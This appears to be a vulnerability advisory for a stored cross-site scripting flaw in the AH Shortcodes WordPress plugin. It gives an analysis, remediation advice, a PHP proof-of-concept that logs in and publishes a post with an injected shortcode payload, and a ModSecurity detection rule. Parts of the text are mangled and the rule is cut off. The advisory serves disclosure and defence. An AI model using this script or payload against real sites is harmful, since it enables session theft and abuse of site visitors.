CVE-2025-14109: AH Shortcodes <= 1.0.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'column' Shortcode Attribute (ah-shortcodes)

{
“analysis”: “Atomic Edge analysis of CVE-2025-14109 (metadata-based):nThis vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the AH Shortcodes WordPress plugin. The vulnerability exists in the plugin’s ‘column’ shortcode attribute. Attackers with Contributor-level permissions or higher can inject malicious scripts into pages or posts. These scripts execute when a user views the compromised content. The CVSS score of 6.4 (Medium) reflects the requirement for authentication and the scope change impact on site users.nnAtomic Edge research infers the root cause is insufficient input sanitization and output escaping for the ‘column’ shortcode attribute. The CWE-79 classification confirms improper neutralization of input during web page generation. The plugin likely registers a shortcode handler that directly echoes or unsafely prints user-supplied attribute values without applying proper escaping functions like `esc_attr()` or `wp_kses()`. This conclusion is inferred from the CWE and the standard WordPress shortcode implementation pattern, as no source code diff is available for confirmation.nnAn attacker exploits this by creating or editing a post with the vulnerable shortcode. The payload is placed within the ‘column’ attribute. A typical malicious shortcode block would be `[ah_column column=”alert(document.domain)”]Content[/ah_column]`. The attacker saves the post. The malicious script then executes in the browsers of all visitors who view that post. Contributor-level users can create unpublished posts, which is sufficient for this attack.nnRemediation requires implementing proper output escaping. The plugin must escape the ‘column’ attribute value before outputting it into the page’s HTML context. Standard WordPress functions for this include `esc_attr()` for attribute contexts or `wp_kses()` for more controlled HTML stripping. Input sanitization using `sanitize_text_field()` on the attribute value during shortcode processing would provide a secondary layer of defense. The patch should also validate the attribute’s expected data type.nnSuccessful exploitation leads to limited confidentiality and integrity loss within the victim’s browser context. Attackers can steal session cookies, perform actions as the victim user, deface the site content, or redirect users to malicious sites. The impact is confined to the browser session of users viewing the infected page. It does not directly lead to server compromise or database access.”,
“poc_php”: “// Atomic Edge CVE Research – Proof of Concept (metadata-based)n// CVE-2025-14109 – AH Shortcodes <= 1.0.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'column' Shortcode Attributenalert(document.domain)’;n$shortcode_content = “Injected post content.”;n$post_title = “Test Post with XSS”;nn// Initialize cURL session for cookie handlingn$ch = curl_init();ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookies.txt’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);nn// Step 1: Authenticate to WordPressncurl_setopt($ch, CURLOPT_URL, $target_url);ncurl_setopt($ch, CURLOPT_POST, true);n$login_fields = [n ‘log’ => $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => ‘1’n];ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));n$response = curl_exec($ch);nn// Step 2: Extract the nonce for creating a post.n// Assumption: The plugin does not add extra nonce checks for shortcode attributes in the post editor.n// The standard WordPress post creation nonce is required.ncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/post-new.php’);ncurl_setopt($ch, CURLOPT_HTTPGET, true);n$response = curl_exec($ch);nnpreg_match(‘/”_wpnonce” value=”([a-f0-9]+)”/’, $response, $nonce_matches);n$creation_nonce = $nonce_matches[1] ?? ”;nnif (empty($creation_nonce)) {n die(“Failed to extract nonce for post creation.”);n}nn// Step 3: Create a new post containing the malicious shortcode.n// The exact shortcode tag name is inferred from the plugin name ‘AH Shortcodes’ and the vulnerable ‘column’ attribute.n// We assume the shortcode is registered as something like ‘ah_column’.n$post_content = “[ah_column column=\”” . $malicious_attribute . “\”]” . $shortcode_content . “[/ah_column]”;nn$post_fields = [n ‘post_title’ => $post_title,n ‘content’ => $post_content,n ‘publish’ => ‘Publish’,n ‘_wpnonce’ => $creation_nonce,n ‘_wp_http_referer’ => ‘/wp-admin/post-new.php’,n ‘post_type’ => ‘post’,n ‘post_status’ => ‘publish’n];nncurl_setopt($ch, CURLOPT_URL, $target_url . ‘/wp-admin/post.php’);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));n$response = curl_exec($ch);nn// Check for success (a redirect to the post or edit screen)nif (curl_getinfo($ch, CURLINFO_HTTP_CODE) === 200 || curl_getinfo($ch, CURLINFO_HTTP_CODE) === 302) {n echo “Proof of Concept executed. Check the published post for XSS execution.\n”;n echo “The post contains the shortcode: ” . htmlspecialchars($post_content) . “\n”;n} else {n echo “Post creation may have failed. HTTP Code: ” . curl_getinfo($ch, CURLINFO_HTTP_CODE) . “\n”;n}nncurl_close($ch);nn?>”,
“modsecurity_rule”: “# Atomic Edge WAF Rule – CVE-2025-14109 (metadata-based)nSecRule REQUEST_URI “@streq /wp-admin/admin-ajax.php” \n “id:1410901,phase:2,deny,status:403,chain,msg:’CVE-2025-14109 via AH Shortcodes AJAX’,severity:’CRITICAL’,tag:’CVE-2025-14109′,tag:’WordPress’,tag:’Plugin’,tag:’XSS'”n SecRule ARGS_POST:action “@rx ^ah_shortcodes_” “chain”n SecRule ARGS_POST|ARGS_GET “@rx column\s*[=]\s*[^\s>]*[\”‘][^>]*[]”
}